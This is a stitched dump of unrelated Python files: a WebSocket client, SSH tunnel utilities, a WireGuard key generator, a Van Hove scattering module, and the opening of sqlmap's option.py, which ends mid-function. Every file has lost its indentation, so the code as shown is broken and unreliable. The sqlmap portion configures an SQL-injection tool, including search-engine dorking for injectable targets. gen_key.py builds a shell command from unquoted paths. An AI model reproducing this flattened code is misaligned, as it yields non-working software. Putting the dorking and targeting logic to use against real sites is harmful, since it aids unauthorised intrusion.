Fore.CYAN + Style.BRIGHT + f"UI: http://127.0.0.1:{port}/ui" + Style.RESET_ALL
)
print()
print(Style.DIM + "(CTRL-C to stop)" + Style.RESET_ALL)
sio.run(app, debug=False, port=port)
print()
print(Fore.RED + Style.BRIGHT + f"Stopping streams..." + Style.RESET_ALL)
for stream in streams:
try:
stream.stop()
print(Fore.RED + f" stopped stream '{stream.name}'" + Style.RESET_ALL)
except ValueError as e:
print(
Fore.RED
+ f" stream '{stream.name}' already stopped"
+ Style.RESET_ALL
)
print()
|
threadedclient.py | # -*- coding: utf-8 -*-
import threading
from ws4py.client import WebSocketBaseClient
__all__ = ['WebSocketClient']
class WebSocketClient(WebSocketBaseClient):
def __init__(self, url, protocols=None, extensions=None, heartbeat_freq=None,
ssl_options=None, headers=None, exclude_headers=None):
"""
.. code-block:: python
from ws4py.client.threadedclient import WebSocketClient
class EchoClient(WebSocketClient):
def opened(self):
for i in range(0, 200, 25):
self.send("*" * i)
def closed(self, code, reason):
print(("Closed down", code, reason))
def received_message(self, m):
print("=> %d %s" % (len(m), str(m)))
try:
ws = EchoClient('ws://localhost:9000/echo', protocols=['http-only', 'chat'])
ws.connect()
except KeyboardInterrupt:
ws.close()
"""
WebSocketBaseClient.__init__(self, url, protocols, extensions, heartbeat_freq,
ssl_options, headers=headers, exclude_headers=exclude_headers)
self._th = threading.Thread(target=self.run, name='WebSocketClient')
self._th.daemon = True
@property
def daemon(self):
"""
`True` if the client's thread is set to be a daemon thread.
"""
return self._th.daemon
@daemon.setter
def daemon(self, flag):
"""
Set to `True` if the client's thread should be a daemon.
"""
self._th.daemon = flag
def run_forever(self):
"""
Simply blocks the thread until the
websocket has terminated.
"""
while not self.terminated:
self._th.join(timeout=0.1)
def handshake_ok(self):
"""
Called when the upgrade handshake has completed
successfully.
Starts the client's thread.
"""
self._th.start()
if __name__ == '__main__':
from ws4py.client.threadedclient import WebSocketClient
class EchoClient(WebSocketClient):
def opened(self):
def data_provider():
for i in range(0, 200, 25):
yield "#" * i
self.send(data_provider())
for i in range(0, 200, 25):
self.send("*" * i)
def closed(self, code, reason):
print(("Closed down", code, reason))
def received_message(self, m):
print("#%d" % len(m))
if len(m) == 175:
self.close(reason='bye bye')
try:
ws = EchoClient('ws://localhost:9000/ws', protocols=['http-only', 'chat'],
headers=[('X-Test', 'hello there')])
ws.connect()
ws.run_forever()
except KeyboardInterrupt:
ws.close()
|
tunnel.py | """Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 IPython Development Team, Min Ragan-Kelley
#
# Redistributed from IPython under the terms of the BSD License.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os,sys,atexit
import socket
from getpass import getpass, getuser
try:
import paramiko
except ImportError:
paramiko = None
else:
from forward import forward_tunnel
try:
import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
for i in range(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
p.expect('[Ppassword]:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
cmd = ssh + " -f -L 127.0.0.1:%i:%s:%i %s sleep %i"%(lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print (tunnel.exitstatus)
print (tunnel.before)
print (tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
try:
from multiprocessing import Process
except ImportError:
raise ImportError("multiprocessing module required for backgrounding Paramiko tunnnels")
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception:
e = sys.exc_info()[1]
print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# print ('Now forwarding port %d to %s:%d ...' % (lport, server, rport))
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print ('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception:
e = sys.exc_info()[1]
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
gen_key.py | import os
from os import path
from threading import Thread
from netaddr import IPNetwork
cidr = os.environ['CIDR']
client_dir = os.environ['CLIENT_DIR']
number_of_clients = os.environ['NUMBER_OF_CLIENTS']
network = IPNetwork(cidr)
range_ip = list(network)[2:int(number_of_clients)+2]
def gen_key(private_key_path, public_key_path):
if not (path.exists(public_key_path) or path.exists(private_key_path)):
os.system("umask 077; wg genkey | tee %s | wg pubkey > %s" % (private_key_path, public_key_path))
def gen_key_without_thread():
for ip in range_ip:
private_key_path = "{client_dir}/{ip}/privatekey".format(client_dir=client_dir,ip=ip)
public_key_path = "{client_dir}/{ip}/publickey".format(client_dir=client_dir,ip=ip)
gen_key(private_key_path, public_key_path)
def gen_key_thread():
threads = []
for ip in range_ip:
private_key_path = "{client_dir}/{ip}/privatekey".format(client_dir=client_dir,ip=ip)
public_key_path = "{client_dir}/{ip}/publickey".format(client_dir=client_dir,ip=ip)
thr = Thread(target=gen_key, args=(private_key_path, public_key_path,))
thr.start()
threads.append(thr)
# wait for all threads to completed
for thr in threads:
thr.join()
if __name__ == '__main__':
gen_key_thread()
|
van_hove.py | import multiprocessing
import sys
import itertools as it
import warnings
import numpy as np
import mdtraj as md
from progressbar import ProgressBar
from itertools import combinations_with_replacement
from scattering.utils.utils import get_dt, get_unique_atoms
from scattering.utils.constants import get_form_factor
def compute_van_hove(
trj,
chunk_length,
parallel=False,
water=False,
r_range=(0, 1.0),
bin_width=0.005,
n_bins=None,
self_correlation=True,
periodic=True,
opt=True,
partial=False,
):
"""Compute the Van Hove function of a trajectory. Atom pairs
referenced in partial Van Hove functions are in alphabetical
order. If specific ordering of atom pairs are needed, user should
use compute_partial_van_hove then vhf_from_pvhf to compute total
Van Hove function.
Parameters
----------
trj : mdtraj.Trajectory
trajectory on which to compute the Van Hove function
chunk_length : int
length of time between restarting averaging
parallel : bool, default=True
Use parallel implementation with `multiprocessing`
water : bool
use X-ray form factors for water that account for polarization
r_range : array-like, shape=(2,), optional, default=(0.0, 1.0)
Minimum and maximum radii.
bin_width : float, optional, default=0.005
Width of the bins in nanometers.
n_bins : int, optional, default=None
The number of bins. If specified, this will override the `bin_width`
parameter.
self_correlation : bool, default=True
Whether or not to include the self-self correlations
partial : bool, default = False
Whether or not to return a dictionary including partial Van Hove function.
Returns
-------
r : numpy.ndarray
r positions generated by histogram binning
g_r_t : numpy.ndarray
Van Hove function at each time and position
"""
n_physical_atoms = len([a for a in trj.top.atoms if a.element.mass > 0])
unique_elements = list(
set([a.element for a in trj.top.atoms if a.element.mass > 0])
)
if parallel:
data = []
for elem1, elem2 in it.combinations_with_replacement(unique_elements[::-1], 2):
# Add a bool to check if self-correlations should be analyzed
self_bool = self_correlation
if elem1 != elem2:
self_bool = False
warnings.warn(
"Total VHF calculation: No self-correlations for {} and {}, setting `self_correlation` to `False`.".format(
elem1, elem2
)
)
data.append(
[
trj,
chunk_length,
"element {}".format(elem1.symbol),
"element {}".format(elem2.symbol),
r_range,
bin_width,
n_bins,
self_bool,
periodic,
opt,
]
)
manager = multiprocessing.Manager()
partial_dict = manager.dict()
jobs = []
version_info = sys.version_info
for d in data:
with multiprocessing.Pool(processes=multiprocessing.cpu_count()) as pool:
if version_info.major == 3 and version_info.minor <= 7:
p = pool.Process(target=worker, args=(partial_dict, d))
elif version_info.major == 3 and version_info.minor >= 8:
ctx = multiprocessing.get_context()
p = pool.Process(ctx, target=worker, args=(partial_dict, d))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
r = partial_dict["r"]
del partial_dict["r"]
else:
partial_dict = dict()
for elem1, elem2 in it.combinations_with_replacement(unique_elements[::-1], 2):
# Add a bool to check if self-correlations should be analyzed
self_bool = self_correlation
if elem1 != elem2:
self_bool = False
warnings.warn(
"Total VHF calculation: No self-correlations for {} and {}, setting `self_correlation` to `False`.".format(
elem1, elem2
)
)
if elem1.symbol > elem2.symbol:
temp = elem1
elem1 = elem2
elem2 = temp
print("doing {0} and {1} ...".format(elem1, elem2))
r, g_r_t_partial = compute_partial_van_hove(
trj=trj,
chunk_length=chunk_length,
selection1="element {}".format(elem1.symbol),
selection2="element {}".format(elem2.symbol),
r_range=r_range,
bin_width=bin_width,
n_bins=n_bins,
self_correlation=self_bool,
periodic=periodic,
opt=opt,
)
partial_dict[
("element {}".format(elem1.symbol), "element {}".format(elem2.symbol))
] = g_r_t_partial
if partial:
return partial_dict
norm = 0
g_r_t = None
for key, val in partial_dict.items():
elem1, elem2 = key
concentration1 = (
trj.atom_slice(trj.top.select(elem1)).n_atoms / n_physical_atoms
)
concentration2 = (
trj.atom_slice(trj.top.select(elem2)).n_atoms / n_physical_atoms
)
form_factor1 = get_form_factor(element_name=elem1.split()[1], water=water)
form_factor2 = get_form_factor(element_name=elem2.split()[1], water=water)
coeff = form_factor1 * concentration1 * form_factor2 * concentration2
if g_r_t is None:
g_r_t = np.zeros_like(val)
g_r_t += val * coeff
norm += coeff
# Reshape g_r_t to better represent the discretization in both r and t
g_r_t_final = np.empty(shape=(chunk_length, len(r)))
for i in range(chunk_length):
g_r_t_final[i, :] = np.mean(g_r_t[i::chunk_length], axis=0)
g_r_t_final /= norm
t = trj.time[:chunk_length]
return r, t, g_r_t_final
def worker(return_dict, data):
key = (data[2], data[3])
r, g_r_t_partial = compute_partial_van_hove(*data)
return_dict[key] = g_r_t_partial
return_dict["r"] = r
def compute_partial_van_hove(
trj,
chunk_length=10,
selection1=None,
selection2=None,
r_range=(0, 1.0),
bin_width=0.005,
n_bins=200,
self_correlation=True,
periodic=True,
opt=True,
):
"""Compute the partial van Hove function of a trajectory
Parameters
----------
trj : mdtraj.Trajectory
trajectory on which to compute the Van Hove function
chunk_length : int
length of time between restarting averaging
selection1 : str
selection to be considered, in the style of MDTraj atom selection
selection2 : str
selection to be considered, in the style of MDTraj atom selection
r_range : array-like, shape=(2,), optional, default=(0.0, 1.0)
Minimum and maximum radii.
bin_width : float, optional, default=0.005
Width of the bins in nanometers.
n_bins : int, optional, default=None
The number of bins. If specified, this will override the `bin_width`
parameter.
self_correlation : bool, default=True
Whether or not to include the self-self correlations
Returns
-------
r : numpy.ndarray
r positions generated by histogram binning
g_r_t : numpy.ndarray
Van Hove function at each time and position
"""
unique_elements = (
set([a.element for a in trj.atom_slice(trj.top.select(selection1)).top.atoms]),
set([a.element for a in trj.atom_slice(trj.top.select(selection2)).top.atoms]),
)
if any([len(val) > 1 for val in unique_elements]):
raise UserWarning(
"Multiple elements found in a selection(s). Results may not be "
"direcitly comprable to scattering experiments."
)
# Check if pair is monatomic
# If not, do not calculate self correlations
if selection1 != selection2 and self_correlation == True:
warnings.warn(
"Partial VHF calculation: No self-correlations for {} and {}, setting `self_correlation` to `False`.".format(
selection1, selection2
)
)
self_correlation = False
# Don't need to store it, but this serves to check that dt is constant
dt = get_dt(trj)
pairs = trj.top.select_pairs(selection1=selection1, selection2=selection2)
n_chunks = int(trj.n_frames / chunk_length)
g_r_t = None
pbar = ProgressBar()
for i in pbar(range(n_chunks)):
times = list()
for j in range(chunk_length):
times.append([chunk_length * i, chunk_length * i + j])
r, g_r_t_frame = md.compute_rdf_t(
traj=trj,
pairs=pairs,
times=times,
r_range=r_range,
bin_width=bin_width,
n_bins=n_bins,
period_length=chunk_length,
self_correlation=self_correlation,
periodic=periodic,
opt=opt,
)
if g_r_t is None:
g_r_t = np.zeros_like(g_r_t_frame)
g_r_t += g_r_t_frame
return r, g_r_t
def vhf_from_pvhf(trj, partial_dict, water=False):
"""
Compute the total Van Hove function from partial Van Hove functions
Parameters
----------
trj : mdtrj.Trajectory
trajectory on which partial vhf were calculated form
partial_dict : dict
dictionary containing partial vhf as a np.array.
Key is a tuple of len 2 with 2 atom types
Return
-------
total_grt : numpy.ndarray
Total Van Hove Function generated from addition of partial Van Hove Functions
"""
unique_atoms = get_unique_atoms(trj)
all_atoms = [atom for atom in trj.topology.atoms]
norm_coeff = 0
dict_shape = list(partial_dict.values())[0][0].shape
total_grt = np.zeros(dict_shape)
for atom_pair in partial_dict.keys():
# checks if key is a tuple
if isinstance(atom_pair, tuple) == False:
raise ValueError("Dictionary key not valid. Must be a tuple.")
for atom in atom_pair:
# checks if the atoms in tuple pair are atom types
if type(atom) != type(unique_atoms[0]):
raise ValueError(
"Dictionary key not valid. Must be type `MDTraj.Atom`."
)
# checks if atoms are in the trajectory
if atom not in all_atoms:
raise ValueError(
f"Dictionary key not valid, `Atom` {atom} not in MDTraj trajectory."
)
# checks if key has two atoms
if len(atom_pair) != 2:
raise ValueError(
"Dictionary key not valid. Must only have 2 atoms per pair."
)
atom1 = atom_pair[0]
atom2 = atom_pair[1]
coeff = (
get_form_factor(element_name=f"{atom1.element.symbol}", water=False)
* get_form_factor(element_name=f"{atom2.element.symbol}", water=False)
* len(trj.topology.select(f"name {atom1.name}"))
/ (trj.n_atoms)
* len(trj.topology.select(f"name {atom2.name}"))
/ (trj.n_atoms)
)
normalized_pvhf = coeff * partial_dict[atom_pair]
norm_coeff += coeff
total_grt = np.add(total_grt, normalized_pvhf)
total_grt /= norm_coeff
return total_grt
|
option.py | #!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import cookielib
import glob
import inspect
import logging
import os
import random
import re
import socket
import string
import sys
import tempfile
import threading
import time
import urllib2
import urlparse
import lib.controller.checks
import lib.core.common
import lib.core.threads
import lib.core.convert
import lib.request.connect
import lib.utils.search
from lib.controller.checks import checkConnection
from lib.core.common import Backend
from lib.core.common import boldifyMessage
from lib.core.common import checkFile
from lib.core.common import dataToStdout
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import findLocalPort
from lib.core.common import findPageForms
from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
from lib.core.common import getFileType
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import openFile
from lib.core.common import parseRequestFile
from lib.core.common import parseTargetDirect
from lib.core.common import paths
from lib.core.common import randomStr
from lib.core.common import readCachedFileContent
from lib.core.common import readInput
from lib.core.common import resetCookieJar
from lib.core.common import runningAsAdmin
from lib.core.common import safeExpandUser
from lib.core.common import saveConfig
from lib.core.common import setColor
from lib.core.common import setOptimize
from lib.core.common import setPaths
from lib.core.common import singleTimeWarnMessage
from lib.core.common import urldecode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import mergedOptions
from lib.core.data import queries
from lib.core.datatype import AttribDict
from lib.core.datatype import InjectionDict
from lib.core.defaults import defaults
from lib.core.dicts import DBMS_DICT
from lib.core.dicts import DUMP_REPLACEMENTS
from lib.core.enums import ADJUST_TIME_DELAY
from lib.core.enums import AUTH_TYPE
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import DUMP_FORMAT
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import MOBILES
from lib.core.enums import OPTION_TYPE
from lib.core.enums import PAYLOAD
from lib.core.enums import PRIORITY
from lib.core.enums import PROXY_TYPE
from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import WIZARD
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapInstallationException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.exception import SqlmapUserQuitException
from lib.core.log import FORMATTER
from lib.core.optiondict import optDict
from lib.core.settings import CODECS_LIST_PAGE
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DBMS_ALIASES
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DEFAULT_PAGE_ENCODING
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS
from lib.core.settings import DEFAULT_USER_AGENT
from lib.core.settings import DUMMY_URL
from lib.core.settings import IS_WIN
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
from lib.core.settings import LOCALHOST
from lib.core.settings import MAX_CONNECT_RETRIES
from lib.core.settings import MAX_NUMBER_OF_THREADS
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_SPLITTING_REGEX
from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import SUPPORTED_OS
from lib.core.settings import TIME_DELAY_CANDIDATES
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import UNION_CHAR_REGEX
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.core.settings import URI_INJECTABLE_REGEX
from lib.core.threads import getCurrentThreadData
from lib.core.threads import setDaemon
from lib.core.update import update
from lib.parse.configfile import configFileParser
from lib.parse.payloads import loadBoundaries
from lib.parse.payloads import loadPayloads
from lib.parse.sitemap import parseSitemap
from lib.request.basic import checkCharEncoding
from lib.request.connect import Connect as Request
from lib.request.dns import DNSServer
from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler
from lib.request.httpshandler import HTTPSHandler
from lib.request.pkihandler import HTTPSPKIAuthHandler
from lib.request.rangehandler import HTTPRangeHandler
from lib.request.redirecthandler import SmartRedirectHandler
from lib.request.templates import getPageTemplate
from lib.utils.har import HTTPCollectorFactory
from lib.utils.crawler import crawl
from lib.utils.deps import checkDependencies
from lib.utils.search import search
from lib.utils.purge import purge
from thirdparty.keepalive import keepalive
from thirdparty.multipart import multipartpost
from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks
from xml.etree.ElementTree import ElementTree
authHandler = urllib2.BaseHandler()
httpsHandler = HTTPSHandler()
keepAliveHandler = keepalive.HTTPHandler()
proxyHandler = urllib2.ProxyHandler()
redirectHandler = SmartRedirectHandler()
rangeHandler = HTTPRangeHandler()
multipartPostHandler = multipartpost.MultipartPostHandler()
# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html
try:
WindowsError
except NameError:
WindowsError = None
def _loadQueries():
"""
Loads queries from 'xml/queries.xml' file.
"""
def iterate(node, retVal=None):
class DictObject(object):
def __init__(self):
self.__dict__ = {}
def __contains__(self, name):
return name in self.__dict__
if retVal is None:
retVal = DictObject()
for child in node.findall("*"):
instance = DictObject()
retVal.__dict__[child.tag] = instance
if child.attrib:
instance.__dict__.update(child.attrib)
else:
iterate(child, instance)
return retVal
tree = ElementTree()
try:
tree.parse(paths.QUERIES_XML)
except Exception as ex:
errMsg = "something appears to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException(errMsg)
for node in tree.findall("*"):
queries[node.attrib['value']] = iterate(node)
def _setMultipleTargets():
"""
Define a configuration parameter if we are running in multiple target
mode.
"""
initialTargetsCount = len(kb.targets)
seen = set()
if not conf.logFile:
return
debugMsg = "parsing targets list from '%s'" % conf.logFile
logger.debug(debugMsg)
if not os.path.exists(conf.logFile):
errMsg = "the specified list of targets does not exist"
raise SqlmapFilePathException(errMsg)
if os.path.isfile(conf.logFile):
for target in parseRequestFile(conf.logFile):
url, _, data, _, _ = target
key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data))
if key not in seen:
kb.targets.add(target)
seen.add(key)
elif os.path.isdir(conf.logFile):
files = os.listdir(conf.logFile)
files.sort()
for reqFile in files:
if not re.search(r"([\d]+)\-request", reqFile):
continue
for target in parseRequestFile(os.path.join(conf.logFile, reqFile)):
url, _, data, _, _ = target
key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data))
if key not in seen:
kb.targets.add(target)
seen.add(key)
else:
errMsg = "the specified list of targets is not a file "
errMsg += "nor a directory"
raise SqlmapFilePathException(errMsg)
updatedTargetsCount = len(kb.targets)
if updatedTargetsCount > initialTargetsCount:
infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount)
infoMsg += "(parameter unique) requests from the "
infoMsg += "targets list ready to be tested"
logger.info(infoMsg)
def _adjustLoggingFormatter():
"""
Solves problem of line deletition caused by overlapping logging messages
and retrieved data info in inference mode
"""
if hasattr(FORMATTER, '_format'):
return
def format(record):
message = FORMATTER._format(record)
message = boldifyMessage(message)
if kb.get("prependFlag"):
message = "\n%s" % message
kb.prependFlag = False
return message
FORMATTER._format = FORMATTER.format
FORMATTER.format = format
def _setRequestFromFile():
"""
This function checks if the way to make a HTTP request is through supplied
textual file, parses it and saves the information into the knowledge base.
"""
if conf.requestFile:
conf.requestFile = safeExpandUser(conf.requestFile)
seen = set()
if not os.path.isfile(conf.requestFile):
errMsg = "specified HTTP request file '%s' " % conf.requestFile
errMsg += "does not exist"
raise SqlmapFilePathException(errMsg)
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
logger.info(infoMsg)
for target in parseRequestFile(conf.requestFile):
url = target[0]
if url not in seen:
kb.targets.add(target)
seen.add(url)
if conf.secondReq:
conf.secondReq = safeExpandUser(conf.secondReq)
if not os.path.isfile(conf.secondReq):
errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq
errMsg += "does not exist"
raise SqlmapFilePathException(errMsg)
infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq
logger.info(infoMsg)
target = next(parseRequestFile(conf.secondReq, False))
kb.secondReq = target
def _setCrawler():
if not conf.crawlDepth:
return
if not any((conf.bulkFile, conf.sitemapUrl)):
crawl(conf.url)
else:
if conf.bulkFile:
targets = getFileItems(conf.bulkFile)
else:
targets = parseSitemap(conf.sitemapUrl)
for i in xrange(len(targets)):
try:
target = targets[i]
crawl(target)
if conf.verbose in (1, 2):
status = "%d/%d links visited (%d%%)" % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)
except Exception as ex:
errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, getSafeExString(ex))
logger.error(errMsg)
def _doSearch():
"""
This function performs search dorking, parses results
and saves the testable hosts into the knowledge base.
"""
if not conf.googleDork:
return
kb.data.onlyGETs = None
def retrieve():
links = search(conf.googleDork)
if not links:
errMsg = "unable to find results for your "
errMsg += "search dork expression"
raise SqlmapGenericException(errMsg)
for link in links:
link = urldecode(link)
if re.search(r"(.*?)\?(.+)", link):
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
elif re.search(URI_INJECTABLE_REGEX, link, re.I):
if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
message = "do you want to scan only results containing GET parameters? [Y/n] "
